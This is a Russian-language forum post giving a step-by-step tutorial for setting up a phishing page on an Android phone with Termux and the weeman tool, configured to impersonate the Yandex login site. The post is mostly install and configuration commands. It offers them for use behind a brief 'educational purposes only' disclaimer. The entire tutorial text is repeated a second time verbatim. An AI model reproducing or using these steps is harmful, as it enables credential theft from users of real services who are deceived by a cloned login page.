- Регистрация
- 8 Янв 2019
- Сообщения
- 527
- Реакции
- 71
- Баллы
- 118
Привет! В этой статье расскажу, как Android-устройство превращается в инструмент для фишинга. Фишинг — это подмена данных для получения личной информации пользователя.
Для этого понадобится Kali Linux и инструмент weeman. Но сначала нужно установить один из лучших терминалов для Android — Termux. После установки желательно поставить Hacker’s Keyboard для удобства ввода.
Далее вводим команды:
$ apt update
$ apt install
Обязательно стабильное подключение к интернету. Затем:
$ apt install git
Подтверждаем установку, набрав y. Далее:
$ apt install python2
Python нужен для работы weeman. Теперь устанавливаем сам инструмент:
$ git clone https://github.com/evait-security/weeman
$ ls
$ cd weeman
$ ls
$ python2 weeman.py
После успешного запуска выводим справку:
$ help
Теперь настроим фишинговую страницу. Пример на Yandex:
$ set url https://yandex.ru
$ set port 8080
$ set action_url https://yandex.ru
$ show
$ run
После запуска скрипта появится адрес сервера — скопируйте его в браузер для проверки.
Вся информация представлена только в образовательных целях. Автор не призывает к незаконным действиям. Использование материала — на ваш страх и риск.
Для этого понадобится Kali Linux и инструмент weeman. Но сначала нужно установить один из лучших терминалов для Android — Termux. После установки желательно поставить Hacker’s Keyboard для удобства ввода.
Далее вводим команды:
$ apt update
$ apt install
Обязательно стабильное подключение к интернету. Затем:
$ apt install git
Подтверждаем установку, набрав y. Далее:
$ apt install python2
Python нужен для работы weeman. Теперь устанавливаем сам инструмент:
$ git clone https://github.com/evait-security/weeman
$ ls
$ cd weeman
$ ls
$ python2 weeman.py
После успешного запуска выводим справку:
$ help
Теперь настроим фишинговую страницу. Пример на Yandex:
$ set url https://yandex.ru
$ set port 8080
$ set action_url https://yandex.ru
$ show
$ run
После запуска скрипта появится адрес сервера — скопируйте его в браузер для проверки.
Вся информация представлена только в образовательных целях. Автор не призывает к незаконным действиям. Использование материала — на ваш страх и риск.